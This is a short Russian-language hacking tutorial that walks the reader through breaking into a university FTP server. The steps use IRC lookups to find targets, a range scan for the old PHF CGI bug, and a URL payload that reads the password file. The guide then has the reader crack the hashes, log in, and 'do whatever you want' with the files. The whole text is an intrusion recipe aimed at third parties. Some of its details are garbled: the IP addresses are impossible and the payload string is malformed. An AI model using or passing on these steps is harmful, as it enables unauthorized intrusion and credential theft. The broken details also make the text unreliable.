Взлом FTP-узла
Для взлома используется обычный cgi скрипт, а точнее ошибка в нём, так называемый PHF BUG. С 1996 года (именно тогда этот баг обнаружили) почти ни один FTP узел не пофиксил эту конетель. Ну и осталась эта дыра до сих пор.
1. Врубаем IRC клиент и коннектимся к любому серваку.
Обычно самые протухшие и заплесневевшие админы водятся на больших университетских серваках типа ***.edu.
2. Вводим в нашем клиенте /who*.edu (где * - имя универа).
Перед нами должен появиться список юзающих этот сервер людей.
3. Выбираем любого, например vasya-pupkin@lamer.lox.otstoy.edu.
4. Пишем в клиенте /dns vasya-pupkin Этим мы узнаём его IP. Например 123.457.841.3.
5. Дальше берём прогу Grinder. Она позволяет найти любой файл в заданном диапазоне IP.
6. Запускаем прогу и ищём /cgi.bin/phf.cgi в диапазоне <123.457.841.0 - 123.457.841.256>.
Если прога выдала URL FOUND, тогда.
7. Запоминаем IP, где был найден этот кусок скрипта..
допустим это 123.457.841.43,.
8. Открываем браузер и пишем:
http://123.457.841.43/cgi-bin/phf?Qalias=%off/bin/cat%20/etc/password.
И если всё сделано правильно, то перед нами должен появиться файл с паролями всех юзеров..
9. Сохраняем на винт..
10. Качаем взломщик паролей Юникс..
11. Ломаем. И уже под этим логином и паролем входим на FTP сервер этого универа..
Перед тобой ВСЁ файлы университета. Делай с ними что хочешь .